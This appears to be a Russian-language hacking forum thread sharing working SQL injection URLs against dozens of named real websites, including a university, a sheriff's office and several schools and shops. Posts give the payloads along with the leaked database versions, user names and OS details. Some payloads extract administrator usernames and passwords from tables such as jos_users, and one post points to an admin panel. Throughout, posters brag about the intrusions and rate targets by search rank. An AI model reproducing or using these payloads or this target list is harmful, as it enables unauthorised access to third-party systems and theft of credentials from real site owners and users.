SQL Инъекции

Code:

http://www.game-over.net/reviews.php?id=-898%27+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user%28%29,@@version_compile_os),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--+

version:5.1.39
user::game-over@localhost
database:gameover
pr:6
Доигрались=)

Code:

http://www.dhammaweb.net/dhamma_news/view.php?id=-16+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16--+

version:4.0.27-max-log
user:[email protected]
database:dhamma_news
pr:4

 

growinc.net

PHP:

http://www.growinc.net/bios.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5

version: 5.0.83-log
user: [email protected]
database: grow

 

Code:

http://www.uh.edu/news-events/newsrelease.php?releaseid_int=-239+union+select+1,concat_ws(0x3a%20,user(),database(),version()),3,4,5,6,7,8--

User: [email protected]
Version: 4.1.16standard-log
Database: uhnews

Google PR: 7

 

Code:

http://buhservis-plus.ru/news-all.php?nid=-1+and+1=2+union+all+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71),3,4,5,6--

version : 5.1.41-log
user : [email protected]
database : db35455m
os : portbld-freebsd8.0

 

http://www.crocs.web.id/footwear_detail.php?mainID=-12+union+select+1,2,3,4,concat(username,char(58),password),6,7,8,9,10,11+from+admin+limit+0,1--

 

Сайт: http://www.flo-cert.net
ТИЦ: 10
PR: 6
Пример запроса:

Code:

http://www.flo-cert.net/flo-cert/main.php?id=-8+union+select+1,concat_ws(0x0b,database(),user(),version(),@@version_compile_os),3,now(),5,6,7,8,9

database - flocert_web2
user - fcw2db@localhost
version - 5.0.32-Debian_7etch10
os - pc-linux-gnu
tables:

Code:

CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
flocert_content,   
flocert_glossary,   
flocert_menus,   
flocert_news,   
flocert_newsletter,   
flocert_topmenu,   
flocert_users

columns:

Code:

CHARACTER_SET_NAME,   
DEFAULT_COLLATE_NAME,   
DESCRIPTION,   
MAXLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
ID,   
IS_DEFAULT,   
IS_COMPILED,   
SORTLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
COLUMN_DEFAULT,   
IS_NULLABLE,   
DATA_TYPE,   
CHARACTER_MAXIMUM_LENGTH,   
CHARACTER_OCTET_LENGTH,   
NUMERIC_PRECISION,   
NUMERIC_SCALE,   
CHARACTER_SET_NAME,   
COLLATION_NAME,   
COLUMN_TYPE,   
COLUMN_KEY,   
EXTRA,   
PRIVILEGES,   
COLUMN_COMMENT,   
GRANTEE,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
PRIVILEGE_TYPE,   
IS_GRANTABLE,   
CONSTRAINT_CATALOG,   
CONSTRAINT_SCHEMA,   
CONSTRAINT_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
POSITION_IN_UNIQUE_CONSTRAINT,
REFERENCED_TABLE_SCHEMA,   
REFERENCED_TABLE_NAME,   
REFERENCED_COLUMN_NAME,   
SPECIFIC_NAME,   
ROUTINE_CATALOG,   
ROUTINE_SCHEMA,   
ROUTINE_NAME,   
ROUTINE_TYPE,   
DTD_IDENTIFIER,   
ROUTINE_BODY,   
ROUTINE_DEFINITION,   
EXTERNAL_NAME,   
EXTERNAL_LANGUAGE,   
PARAMETER_STYLE,   
IS_DETERMINISTIC,   
SQL_DATA_ACCESS,   
SQL_PATH,   
SECURITY_TYP

 

PHP:

http://www.fa-kit.ru/users.php?id=-1+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,id,name,pass,role),7,8,9,10,11,12,13+from+USERS+LIMIT+0,1--+


role=7 - админы

 

Code:

http://www.vashilinzy.ru/shop/ALL_.html?v[10]=-31+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),0x71),0x71),3,4--  

version : 4.1.25-log
user : vashili3_root@localhost
database : vashili3_cms
os : portbld-freebsd6.3

 

PHP:

http://www.rpguides.de/dnd/game.php?id=-67UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

Host IP: 62.75.178.13
Web Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Powered-by: PHP/5.2.4-2ubuntu5.10
DB Server: MySQL unknown ver
Current DB: RPGuides

переходим на немецкие сайты?

PHP:

http://www.jempartners.ch/ita/news.php?id=1191UNION ALL SELECT 1,2,3,4,5,6,7,%String_Col%,9,10,11,12,13,14,15,16,17,18,19,20,21--

Host IP: 212.90.211.186
Web Server: Apache
Powered-by: PHP/5.2.0-8+etch7
DB Server: MySQL >=5
Current DB: jempartners_ch

 

http://www.kidneytimes.net/article.php?id=-20100301172740+union+select+1,2,version(),4,5,6,7,8,9,10,11--+

версия - 4
-----
http://dddb.net/php/latestnews_Linked.php?id=-2702+union+select+version(),2,3,4

версия - 5

 

Code:

http://brooklynradio.net/show.php?id=-22+union/**/select+1,2,3,4,5,6,user(),8--+

user:soulstat_soulsta@localhost
version:5.1.30
шеленг не прошел =(

 

едушка

http://www.southeastern.edu.gr/article.php?NewsID=-37+union+select+1,2,concat(username,char(58),password),4,5,6,7,8,9+from+administrator

 

http://www.gemeindefreiheit.de/de/aktuelles/news.php?id=-20UNION ALL SELECT 1,2,3,4,5,%String_Col%,7,8--

Host IP: 213.198.64.111
Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
DB Server: MySQL unknown ver

 

Code:

http://www.iutoic-dhaka.edu/dnotice.php?nid=999999%27+and+0+union+select+1,2,concat_ws(0x3a%20,user(),database(),version()),4/*

User: mainsite@localhost
Version: 4.1.7
Database: mainsite

Google PR: 6

 

Code:

http://www.papiorec.org/index.php?url=-8+union+select+unhex%28hex%28version%28%29%29%29--

 

Code:

http://www.imagine-parfum.ru/show_brand_info.php?id=-4+union+all+select+aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71)--&select=brand

version : 5.0.51a-15-log
user : u9667@be2
database : u9667_imagine
os : debian-linux-gnu

 

Code:

http://server3.nmdesigns.com/stpgov/www/cal-view.php?ID=-4495+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37--+&event_date=2010-01-12

user:stpgovread@localhost
version:4.1.20
database:STPGOV

Code:

http://www.stpso.com/mostwanted.php?id=-48+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+

version:4.1.20
user:stpso@localhost
database:stpso
С детства не люблю полицменов=)

Code:

http://www.louisianapropane.com/events.php?action=submit&id=-10+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7--+

version:5.0.90-log
user:[email protected]
database:fuel_louisianapropane_com
pr:4

 

_________________________________________
http://www.mseuf.edu.ph/index2.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=2+union+select+1,2,3,concat_ws%280x3a,username,password%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users+where+gid=25--

http://www.escuelanaval.edu.co/index2.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=2+union+select+1,2,3,concat_ws%280x3a,username,password%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users+where+gid=25--

 

Code:

http://www.stevegoldada.com/stevegoldada/archive.php?mode=P&id=-285+union+select+1,version(),3,4,5,6,7--+

version:4.0.12-max
user:www@localhost

 

Code:

http://amperia.profoffice.ru/index.php?page=3&id=-39+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),8,9+-- 

version : 5.0.67-Max
user : profoffice@localhost
database : rofoffice_ru_3
os : suse-linux-gnu
http://amperia.profoffice.ru/admin.php